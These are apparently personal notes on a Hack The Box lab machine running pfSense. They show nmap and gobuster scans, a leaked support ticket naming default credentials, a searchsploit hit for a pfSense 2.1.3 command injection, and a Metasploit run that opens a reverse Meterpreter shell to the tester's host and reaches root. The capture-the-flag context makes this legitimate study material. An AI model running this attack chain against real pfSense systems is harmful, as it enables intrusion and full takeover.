Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-26 18:57 EDT
Nmap scan report for 10.10.10.60
Host is up (0.16s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time



kali@kali:~$ sudo nmap -sU -sT -T4 --max-retries 0 10.10.10.60
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-26 18:57 EDT
Warning: 10.10.10.60 giving up on port because retransmission cap hit (0).
Warning: 10.10.10.60 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.60
Host is up (0.15s latency).
Not shown: 1000 open|filtered ports, 998 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https


the only trick part is to scan txt ...

kali@kali:~/go/bin$ ./gobuster dir -k --url=https://10.10.10.60 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.60
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt
[+] Timeout:        10s
===============================================================
2020/07/26 19:34:29 Starting gobuster
===============================================================
/themes (Status: 301)
/css (Status: 301)
/includes (Status: 301)
/javascript (Status: 301)
/changelog.txt (Status: 200)
/classes (Status: 301)
/widgets (Status: 301)
/tree (Status: 301)
/shortcuts (Status: 301)
/installer (Status: 301)
/wizards (Status: 301)
/csrf (Status: 301)
/system-users.txt (Status: 200)



####Support ticket###

Please create the following user


username: Rohit
password: company defaults


rohit
pfsense

after login it shows 2.1.3


ali@kali:~/htb$ searchsploit pfsense 2.1.3
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection                                | php/webapps/43560.py
---------------------------------------------------------------------------------------------- ---------------------------------


msf5 exploit(unix/http/pfsense_graph_injection_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.14:4444 
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (38288 bytes) to 10.10.10.60
[*] Meterpreter session 1 opened (10.10.14.14:4444 -> 10.10.10.60:29743) at 2020-07-26 19:57:34 -0400
[+] Deleted Ap

id


meterpreter > 
meterpreter > id
[-] Unknown command: id.
meterpreter > 
meterpreter > shell
Process 53558 created.
Channel 0 created.

id
uid=0(root) gid=0(wheel) groups=0(wheel)


own root then user





